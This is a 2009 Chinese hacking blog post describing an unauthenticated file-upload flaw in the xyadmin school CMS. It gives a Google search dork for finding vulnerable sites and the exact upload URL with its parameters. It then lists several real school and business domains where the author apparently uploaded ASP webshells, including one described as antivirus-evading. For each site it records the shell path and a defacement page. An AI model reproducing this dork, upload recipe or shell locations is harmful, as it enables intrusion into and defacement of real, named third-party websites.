由校园网CMS系统(xyadmin)上传漏洞想到的

由校园网CMS系统(xyadmin)上传漏洞想到的

2009-09-27 04:27

校园网CMS系统(xyadmin)上传漏洞
google关键字：inurl:xyadmin
我们的工具还是g.cn   google hack
我们随便点一个连接看看
这个是上传页面xyadmin/situjiaduotu.asp?formname=baseinfoform&editname=logol&uppath=baseinfo&filelx=.swf.gif.jpg
传马拿shell
xyadmin是校园的缩写
那么其他的如xxadmin可否呢？
http://rnx.tjuci.edu.cn/xyadmin/situjiaduotu.asp?formname=baseinfoform&editname=logol&uppath=baseinfo&filelx=.swf.gif.jpg

window.opener.document.baseinfoform.logol.value='xyadmin/baseinfo/sam美化实用免杀大马.asp'
window.alert("文件上传成功!请不要修改生成的链接地址！");
window.close();
http://www.dslsxx.cn/xyadmin/situjiaduotu.asp?formname=baseinfoform&editname=logol&uppath=baseinfo&filelx=.swf.gif.jpg
shell地址http://www.dslsxx.cn/xyadmin/baseinfo/conn.asp
黑页http://www.dslsxx.cn/conn.asp

http://www.hnaues.com/sutuo/xyadmin/situjiaduotu.asp?formname=baseinfoform&editname=logol&uppath=baseinfo&filelx=.swf.gif.jpg
遇到
window.alert("文件上传成功!请不要修改生成的链接地址！");
window.close();
找不到路径~~~

http://jpkc.aqvtc.cn:8081/xyadmin/situjiaduotu.asp?formname=baseinfoform&editname=logol&uppath=baseinfo&filelx=.swf.gif.jpg
window.opener.document.baseinfoform.logol.value=
'xyadmin/baseinfo/conn.asa'
window.alert("文件上传成功!请不要修改生成的链接地址！");
window.close();
http://jpkc.aqvtc.cn:8081这个网站
http://jpkc.aqvtc.cn:8081/xyadmin/baseinfo/conn.asa
黑页http://jpkc.aqvtc.cn:8081/conn.asp

http://www.hssxfl.com/xyadmin/situjiaduotu.asp?formname=baseinfoform&editname=logol&uppath=baseinfo&filelx=.swf.gif.jpg
http://www.lbkjb.com/xyadmin/situjiaduotu.asp?formname=baseinfoform&editname=logol&uppath=baseinfo&filelx=.swf.gif.jpg
window.opener.document.baseinfoform.logol.value=
'xyadmin/baseinfo/conn.asa'
window.alert("文件上传成功!请不要修改生成的链接地址！");
window.close();
shell地址http://www.lbkjb.com/xyadmin/baseinfo/conn.asa
黑页地址http://www.lbkjb.com/EDW.asp